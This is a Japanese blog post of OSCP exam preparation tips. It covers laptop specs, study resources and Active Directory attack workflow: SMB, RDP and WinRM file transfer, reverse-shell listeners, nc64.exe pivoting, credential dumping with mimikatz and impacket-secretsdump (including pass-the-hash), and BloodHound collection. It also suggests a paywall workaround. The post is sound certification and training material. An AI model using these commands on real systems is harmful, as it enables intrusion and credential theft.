令和8年にOSCPに合格したので、私が受験のときに知っておきたかった情報をまとめました。
PCの必要スペックについて
目安として、中古で買ったThinkPad X1 nano Gen1(約10万円)で十分でした。
ウェブカメラも元々ついている内側カメラで十分です。
私はwindows11にしてmicrosoft office2021入れてます。

CPU Core i7-1160G7(4コア8スレッド、4.40GHz)
GPU Intel Iris Xe Graphics(1.10GHz)
メモリ LPDDR4x-4267 SDRAM 16GB
ストレ-ジ OSCP試験時512gb (現在2tb)
メモリについて
問題になるのはパスワードクラック
OSCPのパスワードクラックは10分で分かるといいますが、10分で分かるの16ギガバイトでぎりぎりじゃないかな?と思います。
Offsecの提示する最低要件はメモリ4gb、推奨はメモリ8gb以上ですが、
Surface Go (第 1 世代)
CPU:Intel Pentium Gold 4415Y (1.6GHz)
メモリ 8GB RAM
ストレージ 128GB SSD
では通常解析のパスワードクラックでも時間がかかりすぎてラビットホールか分からず損切りできず、かなりきつかったです。
メモリ16gbのマシンを使っていても、たとえばOffsec練習場Providing GroundのSPXというマシンでのhashcatの結果は
Started: Wed Apr 15 13:00:39 2026
Stopped: Wed Apr 15 14:50:18 2026
で、1時間50分かかりました。
このマシンが特殊だったのもありますが、快適に進めるためにはメモリ16gbあった方がいいです。じゃないとラビットホールか正しいパスか見分けられない気がします。
ストレージについて
試験ではなくて、練習の際に問題になります。
OSCP-LK,hacker blue printといったダウンロード系のマシンで練習することを考えたら、できれば512gbはほしい。
ADを練習するために3台のwindowsサーバーを同時に立ち上げることになりますが、たとえばOSCP-LKだとサーバー1台20gb弱のサイズがあり、60gbのサイズが必要になります。
ADだけでこれだけ必要なので、快適にダウンロード系マシンで練習するならある程度の容量がないと都度アンインストールしたり外付けに移したりする必要があります。
OSCPの情報収集
reddit r/oscp
受験生の生の声が集まる

hack smarter , hacker blue print , OSCP-LKの無料告知が行われる!期間限定が多いのでフォローしておくべき
みんなが何に苦労しているか、新しいツールで何がおすすめか情報が集まります。
AD対策
OSCPはペネトレーションテストなので、どうしても攻撃手法に注目が集まり、あまり触れられることがないのですが、ファイルをkaliから攻撃対象のマシンにアップロードしたりダウンロードしたりということを自由にできることも重要です。
ファイル移動についてまとめました。
第1マシン
kaliからファイルをダウンロード、アップロードする
初期アクセス用のアカウントがもらえるので、それを使ってファイルのやりとりをすることになります。
139,445番ポート-SMB
あまり想像したくないですがSMB接続のケースから
#共有フォルダをリスト
smbclient -L //192.168.10.10/ -U domain//username%password
#接続
smbclient //192.168.10.10/'shares' -U domain//username%password
#タイムアウトエラーを見越してタイムアウト時間を指定
smbclient //192.168.10.10/'shares' -U domain//username%password -t 3600
接続後
#ファイルをダウンロード
smb: \share\> get secret.txt
#ファイルをアップロード
smb: \share\> put reverseshell.php
3389番ポート-リモートデスクトップ
kaliで事前に共有用のフォルダ(例:/home/kali/share)を作成しておき、/driveオプションを指定することで共有フォルダ付きリモートデスクトップ接続ができます。
xfreerdp /cert-ignore /drive:share,/home/kali/share /u:username /p:password /v:192.168.10.10
リモートデスクトップで開かれたwindowsの"ネットワーク"にkaliの共有フォルダが出現するので、その共有フォルダを介してファイルの行き来が可能になります。
5985番ポート-WinRM
evil-winrm
#アップロード
upload /home/kali/share/x64/mimikatz.exe .
#ダウンロード
download sam /home/kali/sam
リバースシェル
ファイルダウンロード・アップロードができるシェルハンドラー(高機能リスナー)もあるので、"nc -lvpn 4444"の代わりに使用すればファイルのアップロード・ダウンロードができます。
penelopeペネロペ
リバースシェルをつかんで離さないリスナー
待ち受けポートが埋まるので注意(リバースシェル捕捉後別ポートにスライドしない)

使い方(例はlinuxですがwindowsでも使えます)
python3 penelope.py -p 80
# (別マシン攻略で80番使えなくなるので本当は80番なんかふさがない方がいい)
接続後、fn+f12でメインメニュー
場合によってはfn+cでメインメニュー(リバースシェル捕捉後に表示された説明をよく読む)
# ファイルをアップロード
[!] Session detached ⇲
(Penelope)─(Session [1])> upload /home/kali/lin/linpeas.sh
[+] Upload OK /tmp/linpeas.sh
(Penelope)─(Session [1])> upload /home/kali/lin/pspy64
[+] Upload OK /tmp/pspy64
(Penelope)─(Session [1])>
download コマンドでダウンロードもできます。
元のシェルに復帰
sessionsで確認してsessions 1で復帰
(Penelope)─(Session [1])> sessions
➤ neutr.com 192.168.1.1 Linux-x86_64
ID | Shell | User | Source
[1] | PTY | git(1015) | TCPListener(0.0.0.0:80)
(Penelope)─(Session [1])> sessions 1
[+] Interacting with session [1] • Shell Type PTY • Menu key F12 ⇐
[+] Logging to /home/kali/.penelope/sessions/neutr.com~192.168.1.1-Linux-x86_64/2026_04_14-07_59_56-344.log
harryyuni@neutr:/tmp$ ls
linpeas.sh
pspy64
第2マシン・DC
第2マシン、DCにポートスキャンする
Windows用公式ツールのPortQry.exeを使う
チャレンジラボのABCでお分かりかと思いますが、kaliから第2マシン、DCといった内部ネットワークマシンのポートスキャンを実行するのは難しいです。
第1マシンにPortQry.exeをアップロードしてPowershellから実行しましょう。
ただ、遅い。本当はポート未指定で.\PortQry.exe -n 10.10.10.10 -q -r 0:10000のように使いたいけど遅すぎて使い物になりません。
ですから
.\PortQry.exe -n 10.10.10.10 -o 21,22,25,80,135,139,443,445,1433,3306,3389,5985,8000,8080
のように頻出ポート決め打ちで使っていました。それでもポートスキャンしないでツール決め打ちするより、根拠がある分おすすめですよ。
第2マシン、DCからのリバースシェルがkaliに届かないとき
ポート転送で解決する方法もあるのでしょうが、私は第1マシンを踏み台にしていました。
第1マシンでリスナー起動して、第2マシン、DCから第1マシンの内部ipアドレス宛にリバースシェルを送ります。

Windows版nc64.exeを使います。
第1マシンがよっぽど古くない限りnc64.exeを使えばよいと思います。
まずは、第1マシンにnc64.exeを送ります。
コマンドプロンプトではバックスラッシュで実行、もしくは絶対パスで実行することになります。
.\nc.exe -l -p 443
#もしくはドライブ名から絶対パスで指定して実行
c:\users\username\nc.exe -l -p 443
powershellではスラッシュで実行できます。
PS C:\Users\Administrator\documents> ./nc64.exe -l -p 443
nc64.exeを実行するとUACのポップアップが起動することもあるので、管理者権限のリモートデスクトップ接続で実行するとつまづきにくいと思います。
第1マシンをファイルサーバーとして使用
第2マシンに接続後は、第1マシンをファイルサーバーにしてkaliからも、第2マシン、DCからもアクセスしてしまうという方法があります。
username:passwordというクレデンシャルを入手したと仮定
第1マシンでusernameにアクセス権限のあるフォルダで実行
PS C:\Users> New-SmbShare -Name "yunishare" -Path "C:\users" -FullAccess "Everyone"
Name ScopeName Path Description
---- --------- ---- -----------
yunishare * C:\users
DC,第2マシンから第1マシンに接続(この場合はhドライブを共有フォルダに割り当てる)
PS C:\windows\temp> net use H: \\10.10.10.10\yunishare /user:domain\username password /y
The command completed successfully.
PS C:\windows\temp> cd h:
kaliから第1マシンに接続(smbclient)
smbclient \\\\192.168.10.10\\yunishare -U username%password
ハッシュダンプを確実に抜く
mimikatzだけではハッシュ抜ききれないマシンがあるんです
OSCP-LK
OSCPリストで有名なレインクサナギが自ら作った問題(ときどきredditで無料キャンペーンをしている)
MartiniAD-hacksmarter
impacket-secretsdump 使いましょう
ファイル移動の手間なしでkaliから実行できる!!
権限昇格後は、ぜひmimikatzだけでなくimpacket-secretsdumpも使って資格情報を抜きましょう。
# パスワードで実行
impacket-secretsdump administrator:'password'@10.10.10.10
# NTLMハッシュで実行
impacket-secretsdump administrator@10.10.10.10 -hashes :5f4dcc3b5aa765d61d8327deb882cf99
AD情報を確実に集める
- Sharphound.exeだけでは横移動のためのAD情報が足りない
- 初期アクセスができていない状態でAD情報がいるとき
Hacksmarter-Arasaka
Sharphound.exeだけではAD情報が抜ききれないマシンがHacksmarterにあったので、私はSharphound.exeで抜いたzipファイルとbloodhound-pythonで抜いたjsonファイルのすべてをbloodhoundCEに入れて漏れのないようにしていました。
パイソン版bloodhoundでkaliからAD情報を抜く
bloodhound-python --dns-tcp -ns 10.10.10.10 -d domain -u 'username' -p 'password' -c all
ADの練習にはHackSmarterがおすすめです。運営のタイラーラムズビーは気前がいいので、新しいマシンは無料提供したり、1か月無料キャンペーンをしたりしています。
redditを追うとよいと思います。
頻出エラーであきらめない
エラーが出てきたら、解消不可能なものかどうか、英語を読みましょう。英語が読めなくても、google翻訳に張り付けて確認しましょう。
OSCPはAI禁止でコードをAIに投げられないので、エラーを解消したときは解消方法をメモで残しておきましょう。
パイソンのエラーもまとめておくと、エクスプロイトが刺さらないときに落ち着いて対応できます。
smbの頻出エラー
たとえば、SMBに接続しようとして
parallel_read returned NT_STATUS_IO_TIMEOUT
のエラーが出た場合は、タイムアウトしてファイルが壊れます。
smbclient //192.168.10.10/shares -U domain//username%password -t 3600
でタイムアウト時間を増やしてアクセスしなおします。
ftpの頻出エラー
たとえば、ftpからデータをダウンロードしようとして
WARNING! 500 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
が出たら、
binary
と実行してバイナリモードにしてからファイルを連れてくる必要があります。
PDFファイルなど、プレーンテキストファイル( .txt )以外を連れてくるときはバイナリモードにしましょう。
OSCPの攻略お勧めのサイト
https://got-root.medium.com/
OSCPの攻略記事が超有用。無料リンクを押せないときは開発者ツール使ったりsource:でアクセスしてクリックすると読めますよ。
レインクサナギOSCP風マシンリスト
チャレンジラボを終えたらこれを元に練習を重ねていくのが定番です。
- 試験までもう時間がない!というときは公式ウォークスルーあり全6台のOSCP-LK
- 答えを見ないと全然解けない!というときは公式ウォークスルーのあるHackTheBox
- LearnOneで、もうお金ないよ!というときはコース付属のOffsecのProviding Groundsをベースにreddit r/oscpで hack smarter,hacker blue print,OSCP-LKの無料告知を待つといいと思います。
私は、AD対策でOSCP-LKと hack smarterをやりこみ、スタンドアロン対策でProviding GroundsとHackTheBoxをやりこみました。


